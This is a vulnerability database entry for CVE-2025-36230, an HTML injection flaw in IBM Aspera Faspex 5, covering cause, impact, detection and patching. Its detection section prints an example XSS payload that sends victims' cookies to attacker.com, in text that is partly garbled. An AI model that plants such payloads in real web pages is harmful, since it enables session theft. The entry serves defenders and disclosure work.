
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-36230 is an HTML injection vulnerability in IBM Aspera Faspex 5, affecting versions 5.0.0 through 5.0.14.1. A remote attacker with low-privileged access can inject malicious HTML code that, when viewed by a victim, executes within the victim's web browser under the security context of the hosting site. The vulnerability was disclosed on December 26, 2025, with a patch released as version 5.0.14.2. It carries a CVSS v3.1 base score of 5.4 (Medium), assigned by IBM Corporation (IBM Advisory, Red Hat CVE).
The root cause is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page / Basic XSS), meaning the application fails to properly sanitize or encode user-supplied input before rendering it in web pages. An authenticated attacker with low privileges can craft and submit malicious HTML content through the application, which is then stored or reflected and subsequently rendered in other users' browsers within the Aspera Faspex site's security context. Exploitation requires user interaction — a victim must view the injected content — and the attack vector is network-based with low complexity. Related attack patterns include XSS targeting non-script elements (CAPEC-18) and XSS through HTTP query strings (CAPEC-32) (IBM Advisory, Feedly).
Successful exploitation allows an attacker to execute malicious scripts in victims' browsers within the application's security context, potentially enabling session token theft, credential harvesting, and unauthorized actions performed on behalf of the victim. The confidentiality and integrity impacts are both rated Low (scoped as Changed), meaning the attacker can affect resources beyond their own authorization boundary. Availability is not impacted. While the vulnerability alone does not grant direct server-side access, stolen session data could facilitate further account compromise or lateral movement within the application (IBM Advisory, Feedly).
<img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie> or similar script-bearing HTML tags.<script>, <img>, <iframe>, onerror=) in user-controlled fields; web server access logs with requests containing encoded HTML entities (%3Cscript%3E, %3Cimg%3E) in POST body parameters.IBM has released IBM Aspera Faspex version 5.0.14.2 to address this vulnerability; upgrading to this version or later is the primary recommended remediation (IBM Advisory). As interim mitigations, administrators should implement a strict Content Security Policy (CSP) to limit script execution, enforce rigorous input validation and output encoding at the application layer, and restrict user privileges to the minimum necessary. Monitoring application logs for HTML injection patterns and conducting user security awareness training are also recommended defensive measures.
The vulnerability received routine coverage from vulnerability tracking services including Tenable, VulnDB, CIRCL, and ENISA's EUVD shortly after disclosure. A brief post appeared on Bluesky via an automated CVE feed, and the Spanish CCN-CERT published a vulnerability notice. No significant researcher commentary, vendor statements beyond the IBM advisory, or notable media coverage has been identified for this medium-severity issue (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."